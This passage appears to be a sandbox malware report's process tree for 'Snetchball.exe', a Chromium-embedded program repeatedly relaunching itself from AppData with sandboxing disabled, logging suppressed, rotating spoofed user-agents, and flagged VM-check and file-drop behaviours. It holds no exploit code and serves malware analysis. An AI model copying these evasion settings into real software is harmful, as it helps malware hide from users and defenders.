- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2752 --field-trial-handle=2756,i,10173054209621241270,7659192143731456248,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:281⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3016 --field-trial-handle=2756,i,10173054209621241270,7659192143731456248,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:881⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3056 --field-trial-handle=2756,i,10173054209621241270,7659192143731456248,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:881⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=2756,i,10173054209621241270,7659192143731456248,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:181⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=2756,i,10173054209621241270,7659192143731456248,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:181⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4240 --field-trial-handle=2756,i,10173054209621241270,7659192143731456248,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:181⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"82⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"83⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2764 --field-trial-handle=2776,i,10796786755574447271,6451679376294373432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:284⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3032 --field-trial-handle=2776,i,10796786755574447271,6451679376294373432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:884⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3036 --field-trial-handle=2776,i,10796786755574447271,6451679376294373432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:884⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=2776,i,10796786755574447271,6451679376294373432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:184⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"85⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"86⤵
- Drops file in Windows directory
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2840 --field-trial-handle=2844,i,11491564005081317386,2056824221474922703,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:287⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3088 --field-trial-handle=2844,i,11491564005081317386,2056824221474922703,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:887⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2844,i,11491564005081317386,2056824221474922703,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:887⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=2844,i,11491564005081317386,2056824221474922703,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:187⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"88⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"89⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"89⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"89⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"89⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"88⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"88⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"88⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"88⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"88⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2764 --field-trial-handle=2768,i,16187263001065560255,17361716032764758563,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:289⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3028 --field-trial-handle=2768,i,16187263001065560255,17361716032764758563,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:889⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3032 --field-trial-handle=2768,i,16187263001065560255,17361716032764758563,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:889⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=2768,i,16187263001065560255,17361716032764758563,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:189⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"90⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"91⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2768 --field-trial-handle=2772,i,10029763479974940565,442573324817716829,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:292⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3012 --field-trial-handle=2772,i,10029763479974940565,442573324817716829,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:892⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3028 --field-trial-handle=2772,i,10029763479974940565,442573324817716829,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:892⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=2772,i,10029763479974940565,442573324817716829,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:192⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"93⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"94⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2776 --field-trial-handle=2780,i,13071041798649875131,15825953876352023086,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:295⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3004 --field-trial-handle=2780,i,13071041798649875131,15825953876352023086,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:895⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3020 --field-trial-handle=2780,i,13071041798649875131,15825953876352023086,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:895⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=2780,i,13071041798649875131,15825953876352023086,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:195⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=2780,i,13071041798649875131,15825953876352023086,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:195⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4128 --field-trial-handle=2780,i,13071041798649875131,15825953876352023086,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:195⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"96⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"97⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2788 --field-trial-handle=2792,i,11155713609606705709,2032722964553027403,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:298⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3100 --field-trial-handle=2792,i,11155713609606705709,2032722964553027403,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:898⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.122 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3104 --field-trial-handle=2792,i,11155713609606705709,2032722964553027403,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:898⤵
-
-
